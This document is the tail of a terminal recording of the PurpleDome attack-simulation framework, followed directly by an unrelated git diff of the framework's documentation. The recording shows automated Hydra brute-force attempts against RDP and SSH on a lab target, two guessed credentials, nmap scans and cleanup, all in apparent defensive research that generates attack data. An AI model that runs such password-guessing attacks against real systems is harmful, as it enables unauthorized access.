attacking the account.\r\n"] +[1144.179691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n"] +[1144.18033, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n"] +[1144.188691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n"] +[1144.189722, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n"] +[1144.191904, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n"] +[1144.193944, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n"] +[1144.199675, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n"] +[1144.200299, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n"] +[1144.200436, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n"] +[1144.209136, "o", "[3389][rdp] account on 192.168.178.145 might be valid 
but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n"] +[1144.20928, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n"] +[1144.209856, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n"] +[1144.210193, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n"] +[1144.219171, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n"] +[1144.219851, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n"] +[1144.220367, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n"] +[1144.220713, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n"] +[1144.229099, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n"] +[1144.229789, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n"] +[1144.23002, "o", "[3389][rdp] account on 
192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n"] +[1144.230646, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n"] +[1144.239324, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n"] +[1144.239896, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n"] +[1144.24068, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n"] +[1144.241006, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] +[1144.247662, "o", "1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n"] +[1144.255595, "o", "Command exited with status 0.\r\n=== stdout ===\r\nReading package lists...\r\nBuilding dependency tree...\r\nReading state information...\r\nhydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries 
per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n[22][ssh] host: 192.168.178.145 login: test password: test\r\n[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) fi"] +[1144.255716, "o", "nished at 2021-06-09 02:56:07\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. 
Use with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 t"] +[1144.255769, "o", "arget did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not acti"] +[1144.255809, "o", "ve for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: 
login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty"] +[1144.255849, "o", ", continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389]"] +[1144.25588, "o", "[rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but 
account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.17"] +[1144.255921, "o", "8.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][r"] +[1144.255953, "o", "dp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for 
remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing"] +[1144.255987, "o", " attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. 
Us"] +[1144.256016, "o", "e with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] acc"] +[1144.256047, "o", "ount on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: 
login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account "] +[1144.256075, "o", "not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root passwor"] +[1144.256105, "o", "d: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but 
account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attac"] +[1144.256136, "o", "king the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, co"] +[1144.256166, "o", "ntinuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for 
remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: non"] +[1144.256191, "o", "existend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not"] +[1144.256222, "o", " active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] +[1149.257446, "o", "Attacking machine with PAW: target3 with attack: nmap\r\n"] +[1149.263047, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1149.290654, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] +[1149.386065, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open 
ssh\r\n\r\n"] +[1149.38617, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n"] +[1149.392608, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] +[1154.397646, "o", "Attacking machine with PAW: target3 with attack: nmap_stresstest\r\n"] +[1154.404994, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1154.430451, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] +[1154.466996, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"] +[1154.467118, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n"] +[1154.474324, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\n"] +[1154.474419, "o", "Debug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] +[1159.477456, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n"] +[1159.69311, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1169.750938, "o", "Could Not Find C:\\capture\\winidp_data.zip\r\r\n"] +[1169.765534, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nCould Not Find 
C:\\capture\\winidp_data.zip\r\n\r\nDebug: Stderr: Could Not Find C:\\capture\\winidp_data.zip\r\n"] +[1169.86244, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1170.144087, "o", " 1 file(s) copied.\r\r\n"] +[1170.158542, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[1170.216215, "o", "sudo kill -SIGHUP $(pidof -s idpx); while [ ! -f /tmp/idpx.proto ]; do sleep 1; done ; rm ~/idpx\r\n"] +[1171.267669, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1171.275309, "o", "\u001b[94m Uninstalling vulnerabilities on target2w \u001b[0m\r\n"] +[1171.339028, "o", "The command completed successfully.\r\r\n\r\r\n"] +[1171.356677, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] +[1171.45084, "o", "The command completed successfully.\r\r\n\r\r\n"] +[1171.473186, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] +[1171.543427, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1171.803471, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.047409, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.31145, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.570747, "o", "The operation completed successfully.\r\r\r\n"] +[1172.583944, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[1172.807534, "o", "\r\r\nUpdated 3 rule(s).\r\r\n"] +[1172.807667, "o", "Ok.\r\r\n"] +[1172.807739, "o", "\r\r\n"] +[1172.844854, "o", "Command 
exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n\u001b[92m Done uninstalling vulnerabilities on target2w \u001b[0m\r\n\u001b[94m Uninstalling vulnerabilities on target3 \u001b[0m\r\n"] +[1172.862366, "o", "userdel: test mail spool (/var/mail/test) not found\r\n"] +[1172.877426, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: test mail spool (/var/mail/test) not found\r\n\r\nDebug: Stderr: userdel: test mail spool (/var/mail/test) not found\r\n"] +[1172.925985, "o", "userdel: password mail spool (/var/mail/password) not found\r\n"] +[1172.945432, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: password mail spool (/var/mail/password) not found\r\n\r\nDebug: Stderr: userdel: password mail spool (/var/mail/password) not found\r\n"] +[1172.957449, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1173.009901, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1173.010037, "o", "\u001b[92m Done uninstalling vulnerabilities on target3 \u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] +[1176.20632, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: target3 \u001b[0m\r\n"] +[1181.648082, "o", "\u001b[92mMachine stopped: target3\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] +[1186.901824, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] +[1186.90263, "o", "Creating zip file loot/2021_06_09___08_38_02/2021_06_09___08_38_02.zip\r\n"] +[1186.931928, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] +[1233.852884, "o", "e"] +[1234.124846, "o", "x"] +[1234.380891, "o", "i"] +[1234.556928, "o", "t"] +[1235.261009, "o", "\r\n"] +[1235.261116, "o", "exit\r\n"] 
diff --git a/doc/source/basics/background.rst b/doc/source/basics/background.rst index 6d0cbef..c4410be 100644 --- a/doc/source/basics/background.rst +++ b/doc/source/basics/background.rst @@ -2,7 +2,7 @@ Basics ====== -Purple Dome is a simulated and automated environment to play with several operating system attacking each other. +Purple Dome is a simulated and automated environment to experiment with several operating system attacking each other. This tool generates an attacker VM and target VMs. Automated attacks are then run against the targets and they will log system events. Those logs will then be stored away for analysis. 
@@ -17,21 +17,21 @@ Features * VM controller abstracted as plugins * Local vagrant based (debug and development) * Cloud based -* Caldera attacks -* Kali attack tools as plugins -* Data collection: Attack log and sensor data +* Attacks as plugins controlling + * Caldera attacks + * Kali attacks + * Metasploit attacks +* Data collection: Attack log and sensor data in parallel with timestamps for matching events * Vulnerability plugins: Modify the targets before the attack Components ========== -You will interact with the command line tools. Those are described in the *CLI* chapter. +The command line tools are the way you will interact with Purple Dome the most. Those are described in the *CLI* chapter. -If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter +The experiments are configured in YAML files, the format is described in the *configuration* chapter. You will also want to create some target VMs. You can do this manually or use Vagrant. Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter. -On of the first things you will want to do is configuring the whole thing. Basically you have to touch two things: The configuration file must be modified (in YAML format). And you will also want to create some target VMs. - -Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter. +If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter. Thanks to a plugin interface this is quite simple. diff --git a/doc/source/basics/configuration.rst b/doc/source/basics/configuration.rst index cb6336c..e16887e 100644 --- a/doc/source/basics/configuration.rst +++ b/doc/source/basics/configuration.rst 
@@ -2,30 +2,20 @@ Configuration ============= -Configuration is contained in yaml files. The example shipped with the code is *experiment.yaml*. +Configuration is contained in yaml files. The example shipped with the code is *template.yaml*. -To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. +To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. Using Vagrant is optional. Machines ======== -Machines (targets and attacker) are configured in *experiment.yaml*. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it. -If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to it's folder. - - -Vagrant machines -~~~~~~~~~~~~~~~~ - -* vagrantfilepath: Path where the vagrantfile is stored - - -Communication interfaces ------------------------- +Machines (targets and attacker) are configured in *experiment.yaml* - the default config file. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it per machine. +If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to the folder containing it. SSH -~~~ +--- -SSH is the default communication interfaces. For Linux machines it can use vagrant to establish communications (get the keyfile). For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. +SSH is the default communication interfaces. If you use Linux and Vagrant Purple Dome can use vagrant to establish SSH communication. For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. Attacks 
@@ -34,32 +24,23 @@ Attacks caldera_attacks --------------- -Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es. But to be flexible with targeting the config has separate lists. +Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es. -All Caldera abilities are available. But Purple Dome is still missing support for parameters and return values. This can restrict the available abilities at the moment. +All Caldera abilities are available. As some will need parameters and Caldera does not offer the option to configure those in the YAML, some caldera attacks might not work without implementing a plugin. kali_attacks ------------ -Kali attacks are kali commandline tools run by a small piece of python code in Purple Dome. This is the reason why not all Kali functionality is available yet. +Kali attacks are kali commandline tools run. Those are executed by specific Purple Dome plugins. Only Kali tools dupported by a plugin are available. You can reference them by the plugin name. kali_conf --------- -All kali attacks can have a special configuration. The configuration is tool specific. +All kali attacks can have a special configuration. The configuration is attack tool specific. -Config file -=========== +Example config file +=================== .. autoyaml:: ../template.yaml -TBD -=== - -Some features are not implemented yet. They will be added to the config file later - -* Terraform -* Separate attack script -* Azure -* Plugin infrastructure (which will change the configuration of plugins, maybe even require splitting and moving configuration around) diff --git a/doc/source/basics/learned.rst b/doc/source/basics/learned.rst index 5847020..778bf46 100644 --- a/doc/source/basics/learned.rst +++ b/doc/source/basics/learned.rst 
@@ -7,16 +7,3 @@ Mistakes made/lessons learned * Caldera server needs golang installed: *sudo apt install golang-go* * WinRM ist NOT the way to go. Better use OpenSSH for Windows. - -Decisions ---------- - -* Plugins and other things that are relevant for University coop are published here: https://github.com/avast -* Purple Dome Core is internal -* Caldera bugs and similar can and should be fixed in the core project -* What has been named "Victim" so far is better named "Target" -* Running it with Windows VMs is essential. Also install AV - * It is possible that Vagrant + Windows has issues. In that case: Build Windows VMs and create Snapshots. This is why we need a better VM control lib. - * MSDN license is ordered - * We will control the attacks. So we can run this without VMCloak -* Avast seems to be moving those things to AWS. So be ready to move the project there as well. diff --git a/doc/source/basics/windows_targets.rst b/doc/source/basics/windows_targets.rst index c9c4410..26994d9 100644 --- a/doc/source/basics/windows_targets.rst +++ b/doc/source/basics/windows_targets.rst @@ -7,11 +7,10 @@ Windows Vagrant boxes need a special setup. They have to be created from a runni Windows Box ----------- -If you use Vagrant you need a vagrant box first. It is a base image the vm will be based on. +If you use Vagrant you need a vagrant box first. On this image the vm will be based on. -The base vm must be running in VirtualBox ! +The base vm must be running in VirtualBox when taking the snapshot. To do so, use:: -Bash:: vagrant package --base 'Windows 10 x64' 
